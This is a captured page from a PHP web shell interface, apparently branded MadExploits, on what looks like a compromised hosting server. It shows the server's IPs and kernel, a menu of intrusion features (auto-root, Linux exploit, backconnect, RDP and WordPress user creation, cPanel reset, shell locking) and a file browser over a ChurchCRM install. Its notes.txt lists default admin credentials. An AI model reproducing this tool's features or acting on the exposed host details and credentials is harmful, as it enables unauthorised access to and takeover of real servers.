Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.147.52.243
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
churchcrm /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
Config.php
2.45
KB
-rw-r--r--
clone.php
3.93
KB
-rw-r--r--
edit.php
4.24
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
1.89
KB
-rw-r--r--
import.php
3.11
KB
-rw-r--r--
info.xml
4.02
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
4.47
KB
-rw-r--r--
install.xml
408
B
-rw-r--r--
integrityCheck.json
20
B
-rw-r--r--
md5
3.06
KB
-rw-r--r--
notes.txt
1.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. Default Login username : admin password : changeme. 2. change "usr_NeedPasswordChange" to 0 in "user_usr" table because script ask to update password after installation. 3. We have created blank integrityCheck.json file to write integrity check status. (Go to Admin -> Edit General settings -> System Settings -> set iIntegrityCheckInterval to 1 and reduce one hour to sLastIntegrityCheckTimeStamp -> Save settings. Now check the file should be created.) This is just to check if this file is needed or not. 4. PHP REQUIREMENT LINK: https://github.com/ChurchCRM/CRM/wiki/Installation or check in {{Path_to_directory}}/vendor/composer/platform_check.php 5. Remove 'DEFINER=`root`@`localhost`' from mysql function (added since version 2.10.1 , we remove this because it's made again)(Isn't required since 4.1.0) 6. Keep $dbPort = ''; as blank in Config.php post installation, since this was mandatory while installing. 7. In ChurchCRM 5.0.2 we had run the setup manually after renaming Include/Config.php.example to /Include/Config.php and manually entering details and hitting setup URL in browser, as their automated install script had a bug so this turnaround was suggested by one of the developers of the script : https://github.com/ChurchCRM/CRM/issues/6072#issuecomment-1257431868 Check in next version if their automated install script works.
Close